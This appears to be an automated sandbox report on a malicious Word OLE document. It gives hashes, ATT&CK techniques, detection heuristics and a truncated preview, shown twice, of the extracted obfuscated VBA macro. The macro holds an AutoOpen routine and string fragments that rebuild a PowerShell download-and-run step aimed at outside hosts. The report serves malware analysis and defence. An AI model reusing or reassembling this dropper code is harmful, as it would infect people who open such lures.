Office (OLE) malware analysis — malicious · c9ecc1b91c2dbe98

MALICIOUS

Office (OLE)

168.4 KB First seen: 2018-02-19

MD5: 83de71039b31cdf2f9ce75aeb26a16b3 SHA-1: 2a8b4f1b67278cd9853071f1cab9e96c1ab8dc72 SHA-256: c9ecc1b91c2dbe98f29dd63fe3638a1fdbcc0ca7bca68e0903e2b7797aac604f

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function and Application.Run to execute arbitrary code, a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further suggests a phishing lure designed to drop malware.

Heuristics 6

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60497 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	60497 bytes
SHA-256: `9225d48fe8fb6837914ab7f404032b738a36eec65993cce65110ea0d8142d9c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mbOAbqH" Sub AutoOpen() On Error Resume Next jicJmFTIX = 4889557 * Sqr(jZIuYEbfQtB) * nsuVDpaBCRYXW / CStr(5318874) * (6915086 / CDate(CduXFPJT) * 557708 / ChrW(qBcSNpfso) * 3258842 * Int(jQTwYXOBkYzUP)) dmzdlXiaS = 8036597 * Sqr(ZYkDjsimTSSNab) * svSSpthMobqB / CStr(1310944) * (3416467 / CDate(RRaUWznKSstK) * 230447 / ChrW(LYYCEfnIAAFsMv) * 5415934 * Int(rXUkABmGEhEkA)) avifPdDSw = 415084 * Sqr(uJQaPimsiZAW) * QwKlRwXaDHaEW / CStr(2451740) * (9499363 / CDate(ZasViqqkM) * 8334044 / ChrW(uMBaZZtPTTR) * 84924 * Int(iLrCqVs)) RpZJzIBHa = 1019623 * Sqr(YaXcOBjAfd) * izHZrqWwotrwIF / CStr(7468042) * (8530054 / CDate(RXlpNtsZdBz) * 8115554 / ChrW(qpPULZBZRK) * 7069116 * Int(QjhbPXbIEjI)) Application.Run "UOtuCsQYh", SjIdJVsJjmfSc rIQGPzOoZ = 1622423 * Sqr(DCjotMqCA) * BNwMLwNdV / CStr(6393138) * (3280340 / CDate(hYMuTmZ) * 522120 / ChrW(LTwdisadOS) * 466111 * Int(vquTtEBAKDbB)) zVLcztEcz = 8293169 * Sqr(uwjjFmAGOOWlh) * bZhXCLHrw / CStr(6174020) * (1850462 / CDate(wiVNZmDAAUKY) * 9225924 / ChrW(KwMmajdKY) * 3748289 * Int(FvfhCBDWYo)) VlBpkihRG = 2953335 * Sqr(boALfJFa) * oGCrUrY / CStr(3591327) * (9543817 / CDate(HBXZoLKzp) * 248443 / ChrW(tSENdGfWWrzwUA) * 2983483 * Int(KUtJOTmIHEPL)) zUMQYIunz = 5710016 * Sqr(ktvabJFDYZcAc) * rjZfvFZqTXBfhX / CStr(2329131) * (1026689 / CDate(ljiIQSsLwBB) * 8223130 / ChrW(WTjUhbVICXRu) * 4980729 * Int(ZvciqTzrUw)) End Sub Function SjIdJVsJjmfSc() On Error Resume Next iJXmFk = ("Dz8VpvpS7S2Xs/'+'UyRC+yRC5PyRC+yR'+'CXQ/yRC+ywD1TiMUJL8k") wvCHOVo = 1100842 * Sqr(EErYqiVcuMD) * MMwFIFnUUvb / CStr(7609318) * (6684439 / CDate(vUZczjDskntJM) * 7104143 / ChrW(ZbfpWdm) * 2216625 * Int(zTVkLJcEpBjAD)) aXipj = 3500350 * Sqr(UZTcJMwsC) * uTwwMMIIj / CStr(5911872) * (6120818 / CDate(ShbKoULBC) * 4264214 / ChrW(SUzJKCcz) * 5289837 * Int(TRpfGdparT)) qEuYlYLu = Mid(iJXmFk, 13, 33) LvQEfjU = ("SdNijU3wEtEbSqQcsR5rroIC{yRC+yRDMw+DMw'+'CtyRC+yRCryyRC+yRC{qyRC+yRC8hfranyRC+yRCDMw+DMwcyRC+yRC.DoyRC+yRCw'+'nloaDMw+D'+'MwdFyRC+yRCDMcMdC4J") qjhsYoUaINL = 7658468 * Sqr(aDWntQYj) * DBLJauWGiFcjw / CStr(4954628) * (7967571 / CDate(HwjztkQjk) * 8595870 / ChrW(WrHMpGm) * 6500839 * Int(wTnMAIoj)) EwwIbzr = 2134904 * Sqr(bijZmSojwSk) * YhtAPXtmdLr / CStr(5757230) * (3409094 / CDate(KWzkvjVKQWqSV) * 8856046 / ChrW(aqOaSvF) * 3602743 * Int(tRqYwPm)) tUpOWFwib = Mid(LvQEfjU, 24, 112) OJbpWzPH = ("QfmciXHMW+'wRC+yRCp'+'yRC+y'+'RDMw+'+'DMwC.yDMw+DMwRC+yRCcyRC+'+'yRCom/asset11ic36tw9") jUZHszST = 7361467 * Sqr(miMDKrljqL) * IIuNzLUHb / CStr(7739932) * (454184 / CDate(iUKIzJzhZ) * 1816668 / ChrW(JlijjCXSRt) * 7648474 * Int(ZajOAfI)) mjPYIOJhkk = 2028427 * Sqr(kMdizioXtdqw) * kcUblFEVlZvPl / CStr(6600114) * (3339404 / CDate(wCQwmZYAAjTjuX) * 2991073 / ChrW(GkqDtYtDGMzniT) * 2769982 * Int(WczbZAC)) zqCzzsJTncw = Mid(OJbpWzPH, 10, 67) whsbV = ("lHHLIqorg/ZLyRC+yRCk'+'pyRC+yRCaPyRC+yRCoT.'+'yRC+yRCSyRC+yRCplit(PoT,PoT);q8hkyRC+yRCayRC+yR'+'CrapDMw+DMwaDMw+DMws =yRC+yRC q8yRC+yc49P8US") rhHtpit = 7069353 * Sqr(CuhSJInVZ) * TNNbZQv / CStr(1560031) * (7750398 / CDate(IjWHKDqzVLzEu) * 6612785 / ChrW(DKzbcwILJu) * 9084288 * Int(AACRzowJVYaIGS)) fmCqKLmULD = 7615157 * Sqr(OBOSfDWGwjLqAV) * NPHpzTtA / CStr(3121256) * (9644393 / CDate(BfkqVKKIwH) * 6143247 / ChrW(PzdvVSdFIAL) * 2519771 * Int(wdojVBwUGBrWF)) irQiwr = Mid(whsbV, 7, 127) wiLOKUzOJV = ("nDwzFDPVcDCWLozRC+yRC}yRC+yRCcatch{wriyRC+yRCtyRC+yRCe-host q8hDMw+DMwyRC'+'+yRC_.EyRC+y'+'RCxceptiDMw+DMwo'+'yRC+yD'+'Mw+DMwRCn.MyRC+yRCes'+'yRC+yRCsa'+'y'+'RC+yRCge;}}y'+'RC).rEPLace(yRCq8hyD3rbiVXOVsUcVc") pMuGo = 9481800 * Sqr(ziiwjwIaLSAZMr) * QvDSimWfUvOZI / CStr(3691783) * (1331112 / CDate(ziIjbYojK) * 7864498 / ChrW(zKoaMIQXYFzSM) * 5437124 * Int(NAUYzHEBBuDKPs)) PuoXcww = 1397661 * Sqr(IptXVfVCRs) * iLBLvEcKnOlplu / CStr(1728573) * (7666562 / CDate(IwA ... (truncated)

SHA-256: 9225d48fe8fb6837914ab7f404032b738a36eec65993cce65110ea0d8142d9c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mbOAbqH"
Sub AutoOpen()
On Error Resume Next
jicJmFTIX = 4889557 * Sqr(jZIuYEbfQtB) * nsuVDpaBCRYXW / CStr(5318874) * (6915086 / CDate(CduXFPJT) * 557708 / ChrW(qBcSNpfso) * 3258842 * Int(jQTwYXOBkYzUP))
dmzdlXiaS = 8036597 * Sqr(ZYkDjsimTSSNab) * svSSpthMobqB / CStr(1310944) * (3416467 / CDate(RRaUWznKSstK) * 230447 / ChrW(LYYCEfnIAAFsMv) * 5415934 * Int(rXUkABmGEhEkA))
avifPdDSw = 415084 * Sqr(uJQaPimsiZAW) * QwKlRwXaDHaEW / CStr(2451740) * (9499363 / CDate(ZasViqqkM) * 8334044 / ChrW(uMBaZZtPTTR) * 84924 * Int(iLrCqVs))
RpZJzIBHa = 1019623 * Sqr(YaXcOBjAfd) * izHZrqWwotrwIF / CStr(7468042) * (8530054 / CDate(RXlpNtsZdBz) * 8115554 / ChrW(qpPULZBZRK) * 7069116 * Int(QjhbPXbIEjI))
Application.Run "UOtuCsQYh", SjIdJVsJjmfSc
rIQGPzOoZ = 1622423 * Sqr(DCjotMqCA) * BNwMLwNdV / CStr(6393138) * (3280340 / CDate(hYMuTmZ) * 522120 / ChrW(LTwdisadOS) * 466111 * Int(vquTtEBAKDbB))
zVLcztEcz = 8293169 * Sqr(uwjjFmAGOOWlh) * bZhXCLHrw / CStr(6174020) * (1850462 / CDate(wiVNZmDAAUKY) * 9225924 / ChrW(KwMmajdKY) * 3748289 * Int(FvfhCBDWYo))
VlBpkihRG = 2953335 * Sqr(boALfJFa) * oGCrUrY / CStr(3591327) * (9543817 / CDate(HBXZoLKzp) * 248443 / ChrW(tSENdGfWWrzwUA) * 2983483 * Int(KUtJOTmIHEPL))
zUMQYIunz = 5710016 * Sqr(ktvabJFDYZcAc) * rjZfvFZqTXBfhX / CStr(2329131) * (1026689 / CDate(ljiIQSsLwBB) * 8223130 / ChrW(WTjUhbVICXRu) * 4980729 * Int(ZvciqTzrUw))
End Sub
Function SjIdJVsJjmfSc()
On Error Resume Next
iJXmFk = ("Dz8VpvpS7S2Xs/'+'UyRC+yRC5PyRC+yR'+'CXQ/yRC+ywD1TiMUJL8k")
wvCHOVo = 1100842 * Sqr(EErYqiVcuMD) * MMwFIFnUUvb / CStr(7609318) * (6684439 / CDate(vUZczjDskntJM) * 7104143 / ChrW(ZbfpWdm) * 2216625 * Int(zTVkLJcEpBjAD))
aXipj = 3500350 * Sqr(UZTcJMwsC) * uTwwMMIIj / CStr(5911872) * (6120818 / CDate(ShbKoULBC) * 4264214 / ChrW(SUzJKCcz) * 5289837 * Int(TRpfGdparT))
qEuYlYLu = Mid(iJXmFk, 13, 33)
LvQEfjU = ("SdNijU3wEtEbSqQcsR5rroIC{yRC+yRDMw+DMw'+'CtyRC+yRCryyRC+yRC{qyRC+yRC8hfranyRC+yRCDMw+DMwcyRC+yRC.DoyRC+yRCw'+'nloaDMw+D'+'MwdFyRC+yRCDMcMdC4J")
qjhsYoUaINL = 7658468 * Sqr(aDWntQYj) * DBLJauWGiFcjw / CStr(4954628) * (7967571 / CDate(HwjztkQjk) * 8595870 / ChrW(WrHMpGm) * 6500839 * Int(wTnMAIoj))
EwwIbzr = 2134904 * Sqr(bijZmSojwSk) * YhtAPXtmdLr / CStr(5757230) * (3409094 / CDate(KWzkvjVKQWqSV) * 8856046 / ChrW(aqOaSvF) * 3602743 * Int(tRqYwPm))
tUpOWFwib = Mid(LvQEfjU, 24, 112)
OJbpWzPH = ("QfmciXHMW+'wRC+yRCp'+'yRC+y'+'RDMw+'+'DMwC.yDMw+DMwRC+yRCcyRC+'+'yRCom/asset11ic36tw9")
jUZHszST = 7361467 * Sqr(miMDKrljqL) * IIuNzLUHb / CStr(7739932) * (454184 / CDate(iUKIzJzhZ) * 1816668 / ChrW(JlijjCXSRt) * 7648474 * Int(ZajOAfI))
mjPYIOJhkk = 2028427 * Sqr(kMdizioXtdqw) * kcUblFEVlZvPl / CStr(6600114) * (3339404 / CDate(wCQwmZYAAjTjuX) * 2991073 / ChrW(GkqDtYtDGMzniT) * 2769982 * Int(WczbZAC))
zqCzzsJTncw = Mid(OJbpWzPH, 10, 67)
whsbV = ("lHHLIqorg/ZLyRC+yRCk'+'pyRC+yRCaPyRC+yRCoT.'+'yRC+yRCSyRC+yRCplit(PoT,PoT);q8hkyRC+yRCayRC+yR'+'CrapDMw+DMwaDMw+DMws =yRC+yRC q8yRC+yc49P8US")
rhHtpit = 7069353 * Sqr(CuhSJInVZ) * TNNbZQv / CStr(1560031) * (7750398 / CDate(IjWHKDqzVLzEu) * 6612785 / ChrW(DKzbcwILJu) * 9084288 * Int(AACRzowJVYaIGS))
fmCqKLmULD = 7615157 * Sqr(OBOSfDWGwjLqAV) * NPHpzTtA / CStr(3121256) * (9644393 / CDate(BfkqVKKIwH) * 6143247 / ChrW(PzdvVSdFIAL) * 2519771 * Int(wdojVBwUGBrWF))
irQiwr = Mid(whsbV, 7, 127)
wiLOKUzOJV = ("nDwzFDPVcDCWLozRC+yRC}yRC+yRCcatch{wriyRC+yRCtyRC+yRCe-host q8hDMw+DMwyRC'+'+yRC_.EyRC+y'+'RCxceptiDMw+DMwo'+'yRC+yD'+'Mw+DMwRCn.MyRC+yRCes'+'yRC+yRCsa'+'y'+'RC+yRCge;}}y'+'RC).rEPLace(yRCq8hyD3rbiVXOVsUcVc")
pMuGo = 9481800 * Sqr(ziiwjwIaLSAZMr) * QvDSimWfUvOZI / CStr(3691783) * (1331112 / CDate(ziIjbYojK) * 7864498 / ChrW(zKoaMIQXYFzSM) * 5437124 * Int(NAUYzHEBBuDKPs))
PuoXcww = 1397661 * Sqr(IptXVfVCRs) * iLBLvEcKnOlplu / CStr(1728573) * (7666562 / CDate(IwA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.